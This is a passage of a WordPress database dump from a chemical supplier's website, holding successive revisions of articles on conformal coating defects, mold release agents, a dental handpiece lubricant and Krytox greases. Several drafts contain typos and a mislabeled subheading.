href="https://www.miller-stephenson.com/product/dental-handpiece-lubricants/">FluoroExtreme™</a> is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (<a href="https://en.wikipedia.org/wiki/ISO_10993">ISO 10993</a>)</span></li>\r\n</ul>\r\n[ux_product_categories ids="12" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricant/">Click here</a> to find out more about these Dental Handpiece Lubricants.', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-11-22 15:17:01', '2016-11-22 15:17:01', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3093, 3, '2016-11-22 15:39:42', '2016-11-22 15:39:42', '', 'scavaging1', '', 'inherit', 'closed', 'closed', '', 'scavaging1', '', '', '2016-11-22 15:39:42', '2016-11-22 15:39:42', '', 3089, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/Scavaging1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3094, 3, '2016-11-22 15:54:03', '2016-11-22 15:54:03', '<h1>Common Conformal Coating Defects and Repairs</h1>\r\nA Conformal coating is a protective chemical coating or polymer film 25-75µm thick (50µm typical) that ‘conforms’ to the circuit board topology. Its purpose is to protect electronic circuits from harsh environments that may contain moisture and or chemical contaminants. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion. Due to the critical application these coating play, proper application is of the utmost importance.  However from time-to-time issues and coating failures do occur and operators and Quality Manager must know how to spot them and promptly correct.  This article will describe and users identify the 6 most common conformal coating defects, their causes, and how they can be repaired. The 6 most common conformal coating defect are the following:\r\n<ol>\r\n 	<li>Capillary Flow</li>\r\n 	<li>Cracking</li>\r\n 	<li>De-wetting</li>\r\n 	<li>Delamination</li>\r\n 	<li>Pin-holes, Bubbles, Foam</li>\r\n 	<li>Orange Peel</li>\r\n</ol>\r\nEach of the above conformal defects can a substantial effect the ultimate performance and protective barrier potential of the applied coating.  Thankfully most of these defects can be avoided by proper substrate preparation and even, uniform application.\r\n<h2><span style="text-decoration: underline;">Capillary Flow</span></h2>\r\nCapillary flow in conformal coating is where the coating pulls or runs away from certain areas of a PCB to more favorable sectors due to a combination of effects. At best, the resulting conformal coating is uneven and patchy; at worst, the substrate is left completely uncoated. Factors that can impact capillary flow of conformal coatings include coatings that are too thin, an over-application of coating, or an attempt to coat a surface that is too cool or that is contaminated, among others. Because of this vulnerability to contaminants, cleaning the surface of the product prior to coating is crucial to achieving the desired end result, as is correctly applying the optimal coating for a given application.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Reducing the conformal coating thickness</li>\r\n 	<li>Sufficiently cleaning the coating of all contaminates with a Precision Cleaning Agent (MS-555 or MS-580N)</li>\r\n 	<li>Apply heat to the board prior to application</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">De-wetting</span></h2>\r\nDe-wetting is the tendency of the coating material to wet the surface that it has been applied to evenly. Contamination can prevent a conformal coating solution from evenly adhering, leveling and "wetting" the substrate. In the event of such a problem, areas of the product remain uncoated, exposing the substrate to further contamination and coating failure. Cleanliness is the key to avoiding this conformal coating defect. But the solution—should the problem occur—is to strip the affected area and manually re-coat it through an exacting re-work process.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Component residues: mold release agents, etc</li>\r\n 	<li>Residues from PCB manufacture: surfactants, solder flux, HASL rinse contamination</li>\r\n</ul>', 'Common Conformal Coating Defects and How to Repair Them', '', 'inherit', 'closed', 'closed', '', '3089-revision-v1', '', '', '2016-11-22 15:54:03', '2016-11-22 15:54:03', '', 3089, 'https://www.miller-stephenson.com/3089-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3095, 3, '2016-11-22 15:58:07', '2016-11-22 15:58:07', '<h1>Common Conformal Coating Defects and Repairs</h1>\r\nA Conformal coating is a protective chemical coating or polymer film 25-75µm thick (50µm typical) that ‘conforms’ to the circuit board topology. Its purpose is to protect electronic circuits from harsh environments that may contain moisture and or chemical contaminants. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion. Due to the critical application these coating play, proper application is of the utmost importance.  However from time-to-time issues and coating failures do occur and operators and Quality Manager must know how to spot them and promptly correct.  This article will describe and users identify the 6 most common conformal coating defects, their causes, and how they can be repaired. The 6 most common conformal coating defect are the following:\r\n<ol>\r\n 	<li>Capillary Flow</li>\r\n 	<li>Cracking</li>\r\n 	<li>De-wetting</li>\r\n 	<li>Delamination</li>\r\n 	<li>Pin-holes, Bubbles, Foam</li>\r\n 	<li>Orange Peel</li>\r\n</ol>\r\nEach of the above conformal defects can a substantial effect the ultimate performance and protective barrier potential of the applied coating.  Thankfully most of these defects can be avoided by proper substrate preparation and even, uniform application.\r\n<h2><span style="text-decoration: underline;">Capillary Flow</span></h2>\r\nCapillary flow in conformal coating is where the coating pulls or runs away from certain areas of a PCB to more favorable sectors due to a combination of effects. At best, the resulting conformal coating is uneven and patchy; at worst, the substrate is left completely uncoated. Factors that can impact capillary flow of conformal coatings include coatings that are too thin, an over-application of coating, or an attempt to coat a surface that is too cool or that is contaminated, among others. Because of this vulnerability to contaminants, cleaning the surface of the product prior to coating is crucial to achieving the desired end result, as is correctly applying the optimal coating for a given application.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Reducing the conformal coating thickness</li>\r\n 	<li>Sufficiently cleaning the coating of all contaminates with a Precision Cleaning Agent (MS-555 or MS-580N)</li>\r\n 	<li>Apply heat to the board prior to application</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">De-wetting</span></h2>\r\nDe-wetting is the tendency of the coating material to wet the surface that it has been applied to evenly. Contamination can prevent a conformal coating solution from evenly adhering, leveling and "wetting" the substrate. In the event of such a problem, areas of the product remain uncoated, exposing the substrate to further contamination and coating failure. Cleanliness is the key to avoiding this conformal coating defect. But the solution—should the problem occur—is to strip the affected area and manually re-coat it through an exacting re-work process.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Component residues: mold release agents, etc</li>\r\n 	<li>Residues from PCB manufacture: surfactants, solder flux, HASL rinse contamination</li>\r\n 	<li>Oil residue: fingerprints, silicone, hydrocarbon, etc.</li>\r\n 	<li>Cleaning bath contamination</li>\r\n 	<li>Residual moisture or condensation on board surface.</li>\r\n</ul>', 'Common Conformal Coating Defects and How to Repair Them', '', 'inherit', 'closed', 'closed', '', '3089-revision-v1', '', '', '2016-11-22 15:58:07', '2016-11-22 15:58:07', '', 3089, 'https://www.miller-stephenson.com/3089-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3096, 2, '2016-11-22 16:31:43', '2016-11-22 16:31:43', '<h3>Mold Release Agents: Which is right for you?</h3>\r\n<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">Mold release agents</a> provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/"><strong>Thermoset polysiloxanes</strong></a>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-22 16:31:43', '2016-11-22 16:31:43', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3097, 3, '2016-11-22 16:48:08', '2016-11-22 16:48:08', '<h1>Common Conformal Coating Defects and Repairs</h1>\r\nA Conformal coating is a protective chemical coating or polymer film 25-75µm thick (50µm typical) that ‘conforms’ to the circuit board topology. Its purpose is to protect electronic circuits from harsh environments that may contain moisture and or chemical contaminants. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion. Due to the critical application these coating play, proper application is of the utmost importance.  However from time-to-time issues and coating failures do occur and operators and Quality Manager must know how to spot them and promptly correct.  This article will describe and users identify the 6 most common conformal coating defects, their causes, and how they can be repaired. The 6 most common conformal coating defect are the following:\r\n<ol>\r\n 	<li>Capillary Flow</li>\r\n 	<li>Cracking</li>\r\n 	<li>De-wetting</li>\r\n 	<li>Delamination</li>\r\n 	<li>Pin-holes, Bubbles, Foam</li>\r\n 	<li>Orange Peel</li>\r\n</ol>\r\nEach of the above conformal defects can a substantial effect the ultimate performance and protective barrier potential of the applied coating.  Thankfully most of these defects can be avoided by proper substrate preparation and even, uniform application.\r\n<h2><span style="text-decoration: underline;">Capillary Flow</span></h2>\r\nCapillary flow in conformal coating is where the coating pulls or runs away from certain areas of a PCB to more favorable sectors due to a combination of effects. At best, the resulting conformal coating is uneven and patchy; at worst, the substrate is left completely uncoated. Factors that can impact capillary flow of conformal coatings include coatings that are too thin, an over-application of coating, or an attempt to coat a surface that is too cool or that is contaminated, among others. Because of this vulnerability to contaminants, cleaning the surface of the product prior to coating is crucial to achieving the desired end result, as is correctly applying the optimal coating for a given application.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Reducing the conformal coating thickness</li>\r\n 	<li>Sufficiently cleaning the coating of all contaminates with a Precision Cleaning Agent (MS-555 or MS-580N)</li>\r\n 	<li>Apply heat to the board prior to application</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">De-wetting</span></h2>\r\nDe-wetting is the tendency of the coating material to wet the surface that it has been applied to evenly. Contamination can prevent a conformal coating solution from evenly adhering, leveling and "wetting" the substrate. In the event of such a problem, areas of the product remain uncoated, exposing the substrate to further contamination and coating failure. Cleanliness is the key to avoiding this conformal coating defect. Contamination can originate from mold release agents, residual surfactant and fluxes from the PCB manufacturing process, cleaning bath contamination, or residual moisture on the board surface.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Minimization of surface contaminates</li>\r\n</ul>\r\n&nbsp;', 'Common Conformal Coating Defects and How to Repair Them', '', 'inherit', 'closed', 'closed', '', '3089-revision-v1', '', '', '2016-11-22 16:48:08', '2016-11-22 16:48:08', '', 3089, 'https://www.miller-stephenson.com/3089-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3098, 0, '2016-11-22 17:14:28', '2016-11-22 17:14:28', '', '', '', 'publish', 'closed', 'closed', '', '3098', '', '', '2016-11-22 17:14:28', '2016-11-22 17:14:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3098/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3099, 0, '2016-11-22 19:33:16', '2016-11-22 19:33:16', '', '', '', 'publish', 'closed', 'closed', '', '3099', '', '', '2016-11-22 19:33:16', '2016-11-22 19:33:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3099/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3100, 3, '2016-11-22 19:49:24', '2016-11-22 19:49:24', '<h1>Common Conformal Coating Defects and Repairs</h1>\r\nA Conformal coating is a protective chemical coating or polymer film 25-75µm thick (50µm typical) that ‘conforms’ to the circuit board topology. Its purpose is to protect electronic circuits from harsh environments that may contain moisture and or chemical contaminants. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion. Due to the critical application these coating play, proper application is of the utmost importance.  However from time-to-time issues and coating failures do occur and operators and Quality Manager must know how to spot them and promptly correct.  This article will describe and users identify the 6 most common conformal coating defects, their causes, and how they can be repaired. The 6 most common conformal coating defect are the following:\r\n<ol>\r\n 	<li>Capillary Flow</li>\r\n 	<li>Cracking</li>\r\n 	<li>De-wetting</li>\r\n 	<li>Delamination</li>\r\n 	<li>Pin-holes, Bubbles, Foam</li>\r\n 	<li>Orange Peel</li>\r\n</ol>\r\nEach of the above conformal defects can a substantial effect the ultimate performance and protective barrier potential of the applied coating.  Thankfully most of these defects can be avoided by proper substrate preparation and even, uniform application.\r\n<h2><span style="text-decoration: underline;">Capillary Flow</span></h2>\r\nCapillary flow in conformal coating is where the coating pulls or runs away from certain areas of a PCB to more favorable sectors due to a combination of effects. At best, the resulting conformal coating is uneven and patchy; at worst, the substrate is left completely uncoated. Factors that can impact capillary flow of conformal coatings include coatings that are too thin, an over-application of coating, or an attempt to coat a surface that is too cool or that is contaminated, among others. Because of this vulnerability to contaminants, cleaning the surface of the product prior to coating is crucial to achieving the desired end result, as is correctly applying the optimal coating for a given application.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Reducing the conformal coating thickness</li>\r\n 	<li>Sufficiently cleaning the coating of all contaminates with a Precision Cleaning Agent (MS-555 or MS-580N)</li>\r\n 	<li>Apply heat to the board prior to application</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">De-wetting</span></h2>\r\nDe-wetting is the tendency of the coating material to wet the surface that it has been applied to evenly. Contamination can prevent a conformal coating solution from evenly adhering, leveling and "wetting" the substrate. In the event of such a problem, areas of the product remain uncoated, exposing the substrate to further contamination and coating failure. Cleanliness is the key to avoiding this conformal coating defect. Contamination can originate from mold release agents, residual surfactant and fluxes from the PCB manufacturing process, cleaning bath contamination, or residual moisture on the board surface.\r\n<h3>Factors to Correct / Prevent De-wetting:</h3>\r\n<ul>\r\n 	<li>Minimization of surface contaminates before assembly; low residue fluxes and pastes</li>\r\n 	<li>Proper cleaning of substrate surface with high purity / low NVR solvents</li>\r\n 	<li>If de-wetting occurs, locally strip area with MS-114 Conformal Coating Stripper and reapply coating</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Cracking</span></h2>\r\nCracking in conformal coating is where a smooth surface fractures into sections with the cracks in the coating leaving the area below exposed to potential contaminants. Cracking is often attributed to temperatures that are too high during the curing or drying processes. However, cracking of the conformal coating can also be caused by particularly low temperatures or by the application of a coating that is too thick. Film thickness that is too large causes coefficient of thermal expansion (CTE) mismatches and yields cracking of the conformal coating. Strategies for avoiding this defect include reducing coating thickness to manage the coefficient of thermal expansion and paying strict attention to temperature control.\r\n<h3>Factors to Correct / Prevent Cracking:</h3>\r\n<ul>\r\n 	<li>Reduce initial cure temperature</li>\r\n 	<li>Allow increased drying time at room temperature before exposing to cure temperatures</li>\r\n 	<li>Reduce coating thickness</li>\r\n</ul>\r\n<h2>Delamination</h2>', 'Common Conformal Coating Defects and How to Repair Them', '', 'inherit', 'closed', 'closed', '', '3089-revision-v1', '', '', '2016-11-22 19:49:24', '2016-11-22 19:49:24', '', 3089, 'https://www.miller-stephenson.com/3089-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3101, 3, '2016-11-22 20:25:12', '2016-11-22 20:25:12', '', 'shutterstock_516734293', '', 'inherit', 'closed', 'closed', '', 'shutterstock_516734293', '', '', '2016-11-22 20:25:12', '2016-11-22 20:25:12', '', 3089, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_516734293.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3102, 3, '2016-11-22 20:26:12', '2016-11-22 20:26:12', '<h1>Common Conformal Coating Defects and Repairs</h1>\r\nA Conformal coating is a protective chemical coating or polymer film 25-75µm thick (50µm typical) that ‘conforms’ to the circuit board topology. Its purpose is to protect electronic circuits from harsh environments that may contain moisture and or chemical contaminants. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion. Due to the critical application these coating play, proper application is of the utmost importance.  However from time-to-time issues and coating failures do occur and operators and Quality Manager must know how to spot them and promptly correct.  This article will describe and users identify the 6 most common conformal coating defects, their causes, and how they can be repaired. The 6 most common conformal coating defect are the following:\r\n<ol>\r\n 	<li>Capillary Flow</li>\r\n 	<li>Cracking</li>\r\n 	<li>De-wetting</li>\r\n 	<li>Delamination</li>\r\n 	<li>Pin-holes, Bubbles, Foam</li>\r\n 	<li>Orange Peel</li>\r\n</ol>\r\nEach of the above conformal defects can a substantial effect the ultimate performance and protective barrier potential of the applied coating.  Thankfully most of these defects can be avoided by proper substrate preparation and even, uniform application.\r\n<h2><span style="text-decoration: underline;">1. Capillary Flow</span></h2>\r\nCapillary flow in conformal coating is where the coating pulls or runs away from certain areas of a PCB to more favorable sectors due to a combination of effects. At best, the resulting conformal coating is uneven and patchy; at worst, the substrate is left completely uncoated. Factors that can impact capillary flow of conformal coatings include coatings that are too thin, an over-application of coating, or an attempt to coat a surface that is too cool or that is contaminated, among others. Because of this vulnerability to contaminants, cleaning the surface of the product prior to coating is crucial to achieving the desired end result, as is correctly applying the optimal coating for a given application.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Reducing the conformal coating thickness</li>\r\n 	<li>Sufficiently cleaning the coating of all contaminates with a Precision Cleaning Agent (MS-555 or MS-580N)</li>\r\n 	<li>Apply heat to the board prior to application</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">De-wetting</span></h2>\r\nDe-wetting is the tendency of the coating material to wet the surface that it has been applied to evenly. Contamination can prevent a conformal coating solution from evenly adhering, leveling and "wetting" the substrate. In the event of such a problem, areas of the product remain uncoated, exposing the substrate to further contamination and coating failure. Cleanliness is the key to avoiding this conformal coating defect. Contamination can originate from mold release agents, residual surfactant and fluxes from the PCB manufacturing process, cleaning bath contamination, or residual moisture on the board surface.\r\n<h3>Factors to Correct / Prevent De-wetting:</h3>\r\n<ul>\r\n 	<li>Minimization of surface contaminates before assembly; low residue fluxes and pastes</li>\r\n 	<li>Proper cleaning of substrate surface with high purity / low NVR solvents</li>\r\n 	<li>If de-wetting occurs, locally strip area with MS-114 Conformal Coating Stripper and reapply coating</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">2. Cracking</span></h2>\r\nCracking in conformal coating is where a smooth surface fractures into sections with the cracks in the coating leaving the area below exposed to potential contaminants. Cracking is often attributed to temperatures that are too high during the curing or drying processes. However, cracking of the conformal coating can also be caused by particularly low temperatures or by the application of a coating that is too thick. Film thickness that is too large causes coefficient of thermal expansion (CTE) mismatches and yields cracking of the conformal coating. Strategies for avoiding this defect include reducing coating thickness to manage the coefficient of thermal expansion and paying strict attention to temperature control.\r\n<h3>Factors to Correct / Prevent Cracking:</h3>\r\n<ul>\r\n 	<li>Reduce initial cure temperature</li>\r\n 	<li>Allow increased drying time at room temperature before exposing to cure temperatures</li>\r\n 	<li>Reduce coating thickness</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">3. Delamination</span></h2>', 'Common Conformal Coating Defects and How to Repair Them', '', 'inherit', 'closed', 'closed', '', '3089-revision-v1', '', '', '2016-11-22 20:26:12', '2016-11-22 20:26:12', '', 3089, 'https://www.miller-stephenson.com/3089-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3103, 2, '2016-11-22 20:31:01', '2016-11-22 20:31:01', '<h3>Krytox High-Performance Greases &amp; Oils Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high-performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include low-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and 